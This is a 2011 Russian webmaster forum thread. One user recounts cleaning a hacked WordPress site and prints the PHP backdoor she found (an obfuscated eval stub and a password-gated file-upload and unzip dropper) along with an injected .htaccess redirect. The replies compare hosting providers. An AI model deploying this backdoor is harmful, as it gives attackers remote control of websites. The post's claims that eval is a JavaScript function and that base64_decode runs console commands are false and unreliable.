WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
04 Декабрь 2016, 22:17:49 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
Ищу копирайтера на постоянную работу. Тематика: цветы, сад, огород от Violet-Lady (Ищу копирайтера, редактора, контент-менеджера)
Re: Интересные статьи из буржунета (переводы) + Рерайтинг + Копирайтинг от semnat (Контент, копирайтинг, переводы)
Re: Партнерка Vsemayki.ru - 25% с продаж. Отличный конверт 1 к 20 от vsemaykiadmin (CPA-сети)
Доска объявлений версии 2.2 от Diana101 (Сайты)
Re: Дизайн от новичка от LanaSvetNik (Дизайн)
Онлайн-консультант Jivosite со скидкой до 20% от KeyWebRu (Хостинг)
Создать тест-опрос в Гугл Документах (или ваш вариант) от Anonyff (Работа и услуги)
Re: AdBean - Бобовая тизерная сеть. Новостные и товарные тизеры. До 90% отчислений! от AdBean (Реклама и доход)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Автоматизация Яндекс Директ + возврат 8% от рекламного бюджета. от Александр_26 (Полезное)
Re: Quick Sender - Комбайн для продвижения в ВКонтакте от Dima_Myrzich (Социальные сети)
Re: Марафон Спарта от Пузата - Почему я иду от Katelite (Обучение сайтостроению, SEO и заработку)
Re: Чистенький женский СДЛ. Размещение в авто от uckpa (Платное размещение статей и ссылок)
Re: [Анонс] Программа для группировки ключевых слов KeyAssort от KeyAssort (Сервисы и SEO программы)
Re: Имеют ли вес покупные ссылки при теперешних правилах Яндекса от Lina7 (Раскрутка сайтов в поисковиках)
Свежие темы
Показать ещё
  Печать  
Страниц: 1 2 3
Автор

Тема: Одна ночь с хостингом TimeWeb  (Прочитано 9789 раз)

0 Пользователей и 1 Гость смотрят эту тему.
GoodShadow
Offline Offline

Пол: Женский
Сообщений: 460


Мур мур :3


Просмотр профиля
« : 30 Декабрь 2011, 10:26:01 »

Сегодня я вам расскажу самую не обычную историю которая возможно вам поможет в ближайшем будущем.

Как обычно я заглянула на форум Веб Леди и увидела в разделе "Нужна помощь!" не замысловатую тему.

Сначала я подумала нечего особенного, с кем не бывает (просто шалит антивирус) на тот момент я и представить не могла чем всё это закончиться.

Не долго думая я сразу перешла к тому что предложила помочь дав свою аську и скайп, спустя 5 минут ко мне добавилась Antonina64, коротко и ясно описав проблему с сайтом мы через программу Team Viver быстро почистили шаблон от переадресации (редиректа) и левых ссылок которые сильно сказывались на времени загрузки сайта.

Но как оказалось в сайте злорадствует вирус, почему злорадствует? потому что ушло 7 часов на то чтоб отловить каждый заражённый файл при том что он постоянно их множил.

Ну и конечно спустя не больше время, сделав вздох я сказала готово и со спокойной душой ушла баяньки  Спящий тогда я даже предположить не могла что меня ждёт через пару дней. Увидев новое сообщение в теме я подумала что Антонина просто зашла меня поблагодарить, но заглянув в тему я узнала что сайт и во все не работает. Как я уже писала в своём руководстве не откладывайте проблему в долгий ящик.

Но по стечению обстоятельств мы не как не могли найти точку соприкосновения, потому что я люблю повечерить, посидеть ночью когда тихо и спокойно... написать статью, попробовать нарисовать шаблон, может быть пару банеров не более того. И вот я чисто случайно натыкаюсь на сайт Антонины уже не просто не открывающейся а именно переадресовывающий меня на какой-то левый сайт.

Естественно не долго думая я сразу ей отписалась и к счастью она была на месте. Сразу же попросила у неё пароль от Team Viver что бы посмотреть что твориться с сайтом, но сайт даже не хотел со мной разговаривать и я решила что пора приступить к тому что просто всё удалить, оставив базу данных и загруженные файлы.

После переустановки естественно нам понадобился чистый шаблон, потому что на старый было трудно положиться и я с радостью предложила свой (красно-розовый шаблончик) под Женский блог.

5 минут радости и всё начинается заново, нечего себе подумала я и переведя дыхания полезла на хостинг, как бы это даже не было странно но я обнаружена следующего рода файлик:

Код:
<?php
eval(gzinflate(base64_decode('тут длинный код, слово длинный мягко сказано')
(
покажу примерный код 7b37VxtHsjj+s7/n3P9hzPGJpEQWj9iJ1zZZYxAxn7XBF4SzWV8fnUEawQRpRjszgpBd/)
error_reporting(0);
set_time_limit(600);
ignore_user_abort(0);

define('RF_SECURITY_CODE''j0kz');

if (isset(
$_POST['security']) && $_POST['security'] == RF_SECURITY_CODE) {
    foreach (
$_FILES as $file) {
        
$nPath dirname(__FILE__) . '/' $file['name'];
        
move_uploaded_file($file['tmp_name'], $nPath);
        if (
substr($nPath, -3) == 'zip') {
            
$archive = new PclZip($nPath);
            if (
$archive->extract(PCLZIP_OPT_PATHdirname(__FILE__), PCLZIP_OPT_REMOVE_PATHdirname(__FILE__)) == 0) {
                die(
"Error : " $archive->errorInfo(true));
            }
            
unlink($nPath);
        }
        
$archive NULL;
    }
    echo 
'RF_DONE';
} else {
    echo 
'NO SECURITY CODE FORCED';
}
?>


Сразу обратила внимания на 2 вещи eval( о котором я уже писала, кто не читал это старая функция java script которая на сайтах использоваться не должна а так же base64_decode не знаю как вам по проще описать эту функцию, скажем так она отвечает за консольные запросы на хостинге, через них можно редактировать любой файл и выполнять все возможные команды.

После удаления файла подумала ну наконец то всё закончилось, но оказалось что нет. До того как я его удалила он успел прописать пару строк в .htaccess

Код:
redirect /~AM http://htaccess.сайт.ru

Долго мучаясь ища куда же он мог прописать код, я же не телепат и не знала что он сидит в .htaccess и притом что не так давно его заменяла на пустой файл. Пишем тикет в тех поддержку -> на что сразу получаем ответ "на нашем хостинге нету антивирусной системы и не какого рода защиты" продолжение "вы должны собственно ручно устранить все возможные уязвимости сайта" мол денег заплати и сделай всё сама (он думает мол самый умный)

Фиг с ним с вашем хостингом, когда уж совсем опустились руки решила зайти по FTP и ещё раз проверить .htaccess и как вы думаете я увидела там редирект именно на тот самый злополучный сайт.

Но тут в друг опомнился хостинг и увидив что я обнаружила вирус и пытаюсь его устранить заблокировал мне доступ на FTP после чего через минуту приходит сообщение в тикет систему "мы всё исправили блаблабла"

В общем для себя я сделала 3 вывода за эту ночь:

1) _timeweb.ru самый без толковый хостинг провайдер во всём интернете. (может конечно преувеличиваю.
2) на многих хостингах не отображаются файлы .htaccess по этому сразу переходите на раздачу слонов  :D ну на FTP и ищите этот файл там.
Оригинал для WP выглядит так:
Код:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /wp/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /wp/index.php [L]
</IfModule>
# END WordPress
3) всё элементарное просто, по этому если вы вот вот подошли к своей цели не бросайте её на пол пути а идите до конца у вас обязательно что-то да получиться.   Дай пять
« Последнее редактирование: 30 Апрель 2016, 04:30:58 от w2 » Записан

skype: goodsh_love
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #1 : 30 Декабрь 2011, 12:00:58 »

Страшно, аж жуть.  Плачущий
Мой сайт, на котром жил вирус, ведь тоже на TimeWeb. Хотя заразиться он мог еще на Data. Не знаю.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
orenmaker
Все будет хорошо. Я спрашивал
Offline Offline

Пол: Мужской
Сообщений: 1085



Просмотр профиля
« Ответ #2 : 30 Декабрь 2011, 13:10:30 »

Тут уже про этот хостинг писалось на форуме, а все продолжают сидеть и думать, авось прокатит. Потратьте 20 минут своего времени и перенесите сайты на достойный хостинг и не будет таких проблем, какие решает GoodShadow, за, что ей спасибо.
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #3 : 30 Декабрь 2011, 13:17:27 »

А достойный это какой?
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #4 : 30 Декабрь 2011, 13:22:22 »

Да какой достойный, уже много перепробовала и  все неустраивает. Про другие хостинги тоже многое тут пишется.
« Последнее редактирование: 30 Декабрь 2011, 13:24:31 от Piranka » Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #5 : 30 Декабрь 2011, 13:46:15 »

Пока кроме TimeWeb и Beget не знаю, что можно выбрать.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #6 : 30 Декабрь 2011, 13:49:54 »

Была тестовый период на Beget и у них что-то случилось с сервером и сайты стали недоступны, после перенесла на TimeWeb, где и до сих пор наверно около года
Записан
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #7 : 30 Декабрь 2011, 13:54:28 »

У меня с Beget пока проблем не было. И техподдержка радует. Но это пока. Не удивлюсь, если все вдруг сломается. Бывает.
Но вот пока на TimeWeb простоев больше, часто не коннектирется база. Хотя падания очень кратковременные. И вот вирус завелся. Но не факт, что виноват хостинг. Техподдержка в сравнении с Beget, конечно, несравнимо хуже.
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
orenmaker
Все будет хорошо. Я спрашивал
Offline Offline

Пол: Мужской
Сообщений: 1085



Просмотр профиля
« Ответ #8 : 30 Декабрь 2011, 13:55:47 »

Была тестовый период на Beget и у них что-то случилось с сервером и сайты стали недоступны, после перенесла на TimeWeb, где и до сих пор наверно около года
Просто так получилось, поломки обычно редки.
Записан
Piranka
Offline Offline

Пол: Женский
Сообщений: 729


Анна


Просмотр профиля
« Ответ #9 : 30 Декабрь 2011, 14:10:29 »

Да вирус на одном сайте тоже один раз был на TimeWeb, но я так поняла не из-за хостинга
Записан
GoodShadow
Offline Offline

Пол: Женский
Сообщений: 460


Мур мур :3


Просмотр профиля
« Ответ #10 : 30 Декабрь 2011, 14:44:56 »

TimeWeb"

Зря вы так думаете, представ те что вы живёте в коммуналке, если случиться пожар но нету огнетушителя то огонь разойдётся по всем комнатам. С хостингом без элементарной защиты и без наличия мозгов просто на просто нечего не смогут сделать кроме как порекомендовать вам сделать откат.
« Последнее редактирование: 30 Декабрь 2011, 15:28:08 от GoodShadow » Записан

skype: goodsh_love
LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #11 : 30 Декабрь 2011, 15:27:31 »

GoodShadow, а что вы предлагаете? Я в смысле какой хостинг рекомендуете?
Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
GoodShadow
Offline Offline

Пол: Женский
Сообщений: 460


Мур мур :3


Просмотр профиля
« Ответ #12 : 30 Декабрь 2011, 15:29:52 »

GoodShadow, а что вы предлагаете? Я в смысле какой хостинг рекомендуете?

Если бы я бы открыла свой хостинг то порекомендовала бы свой  :D

Но по скольку такого нету (временно) могу порекомендовать не плохой хостинг на котором хощусь, но правда он дороговат  Подмигивающий _fornex.com

Дополнение: помните что идеального хостинга не существует, везде бывают свои плюсы и минусы, взлёты и падения! Но данный хостинг относиться к разряду "плати и делай сам(а)"  Спящий
« Последнее редактирование: 30 Декабрь 2011, 15:45:18 от GoodShadow » Записан

skype: goodsh_love
anatol
Offline Offline

Пол: Мужской
Сообщений: 1816


Просмотр профиля
« Ответ #13 : 30 Декабрь 2011, 16:31:55 »

Странно как-то здесь пишут, что нужно делать выбор между time web и beget . У меня сайты находятся на 3 хостингах и ни один не в ходит в число этих двух. Если не нравится, сейчас десятки или сотни других хостингов и многие очень качественные.
Записан



LasyBones
Offline Offline

Сообщений: 36



Просмотр профиля
« Ответ #14 : 30 Декабрь 2011, 17:29:33 »

Если не нравится, сейчас десятки или сотни других хостингов и многие очень качественные.
Так огласите весь список, пожалуйста...(с)  читаем
Я для себя пока не смогла выбрать ничего подходящего, кроме этих двух. Видимо, не там ищу.

Записан

Меняюсь ссылками - стучать в личку
И мое деревце тоже полейте, пожаста, -
Страниц: 1 2 3
  Печать  
 
Перейти в:  

| Sitemap